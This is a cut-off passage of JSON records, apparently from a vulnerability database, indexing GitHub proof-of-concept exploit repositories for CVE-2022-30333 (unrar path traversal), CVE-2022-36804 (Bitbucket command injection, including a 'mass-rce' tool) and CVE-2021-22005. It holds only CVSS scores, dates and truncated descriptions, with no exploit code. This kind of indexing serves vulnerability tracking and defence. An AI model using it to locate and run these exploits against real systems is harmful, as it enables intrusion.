["CVE-2022-37042"], "modified": "2022-12-20T10:09:26", "id": "FCDAD5A1-9FBC-5C1B-9851-198B7C227459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:48", "description": "# Zimbra-CVE-2022-30333\nZimbra unrar vulnerability. Now there ar...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-26T13:28:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-30T22:10:11", "id": "4E2B73A6-1A0A-5AE6-A7D0-44663A8164FC", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:01:36", "description": "# CVE-2022-30333-POC \r\n**Sample file to test CVE-2022-30333**\r\n-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-05T02:35:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-11-19T19:17:38", "id": "A573E62D-1BE0-5CD3-8E6D-EB184127464A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:01:01", "description": "A proof of concept for CVE-2022-30333 - a path traversal vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-15T22:29:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2023-01-31T12:38:36", "id": "098B066E-24CE-5910-B91F-4A11E2A94063", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:55", "description": "A proof of concept for CVE-2022-30333 - a path traversal vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-22T01:14:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T01:11:38", "id": "2AB84274-77B4-5551-8047-C6DEE2425EFF", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:29", "description": "# Bitbucket Server CVE-2022-36804\r\n\r\n## \u6f0f\u6d1e\u63cf\u8ff0\r\n\r\n```\r\nAtlassian \u53d1...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T12:02:57", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-05T12:09:36", "id": "B875D929-E22E-55B9-B81B-D82D9EE19A68", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-23T11:10:09", "description": "# CVE-2022-36804-POC\nA critical vulnerability (CVE-2022-36804) i...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T12:46:33", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-23T08:41:17", "id": "9CED5B40-DA22-502F-90DC-72294B3BA2BF", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-23T11:06:24", "description": "# CVE-2022-36804-POC\nA critical vulnerability (CVE-2022-36804) i...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T12:46:33", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-23T08:41:17", "id": "0AFD46DF-BD61-5745-A809-0746340218B7", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-21T02:02:34", "description": "# CVE-2022-36804-mass-rce\nProof of Concept exploit for CVE-2022-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T10:41:47", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-21T01:42:46", "id": "2F640351-5EB0-5CEE-9708-5FBA0CA9E296", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-24T23:08:05", "description": "# Original Project\n\n[https://github.com/BenHays142/CVE-2022-3680...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T18:06:20", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-24T23:05:19", "id": "FF5905BF-CFF6-58CC-95A4-32C01239A6CF", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:53", "description": "# Atlassian Bitbucket RCE PoC - CVE-2022-36804\n\nThis repo contai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-25T13:16:57", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-31T19:15:37", "id": "56B682D7-17D2-522C-9D1C-67C86911E78F", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:56", "description": "# CVE-2022-36804\nYou can find a python script to exploit the vul...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-24T05:04:30", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-24T18:31:29", "id": "0CEBAB18-60E8-5C65-9F3A-E4266BCAF413", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:00", "description": "# CVE-2022-36804-POC\nA critical vulnerability (CVE-2022-36804) i...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T01:30:29", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-23T08:42:48", "id": "26FF3C6A-B806-5D1D-A90A-26774E640721", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:59", "description": "# CVE-2022-36804 (Bitbucket RCE 2022)\n\nThis repo is part of the ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T08:35:31", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-05-19T03:10:07", "id": "DAAA47B0-5637-5160-BCB3-E488B5CF3512", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:06", "description": "# CVE-2022-36804-PoC\r\nMultithreaded exploit script for CVE-2022-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T13:15:13", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-09T12:32:37", "id": "93E1AD8B-C5DE-5A5E-86E3-5BDFA59A047A", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:07", "description": "# CVE-2022-36804 PoC\nThis repo contains a simple proof of concep...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-07T09:35:49", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-09T12:32:42", "id": "D24F634A-C585-5CC1-90F4-C8360A2B2A24", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:03", "description": "# CVE-2022-36804-POC \ud83d\udd77\ufe0f\nBitbucket CVE-2022-36804 unauthenticated...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-21T10:36:50", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-14T23:18:53", "id": "CCB6354A-0595-55E1-8DF9-BEF3891E6947", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:54:13", "description": "# Atlassian-Bitbucket-Server-CVE-2022-36804\n\nA critical command ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T01:42:26", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-02-02T01:55:08", "id": "BF581D96-BC8F-5A20-9CD3-DA01799A1ED3", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:54:24", "description": "# CVE-2022-36804: Pre-Auth RCE in Atlassian Bitbucket Server\nA c...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-23T12:51:09", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-26T15:58:04", "id": "4B259F70-F148-544C-9B57-BD83FF898A5F", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:06", "description": "# CVE-2022-36804-PoC-Exploit\nA somewhat reliable PoC exploit for...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T02:35:53", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-05-28T03:24:15", "id": "33431FB9-2A29-5155-B353-2A1A8CDF6994", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-23T11:09:57", "description": "# CVE-2022-36804-POC\nA critical vulnerability (CVE-2022-36804) i...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T08:43:52", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-23T08:47:50", "id": "4B077A8D-B9A8-51EC-A30C-160FCB41F9CD", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:59", "description": "# Original Project\n\n[https://github.com/BenHays142/CVE-2022-3680...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T11:05:22", "type": "githubexploit", "title": "Exploit for Command Injection in Atlassian Bitbucket", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-05-15T23:10:05", "id": "50D0DA49-0E53-5DDB-A67D-A87A6928DCFF", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 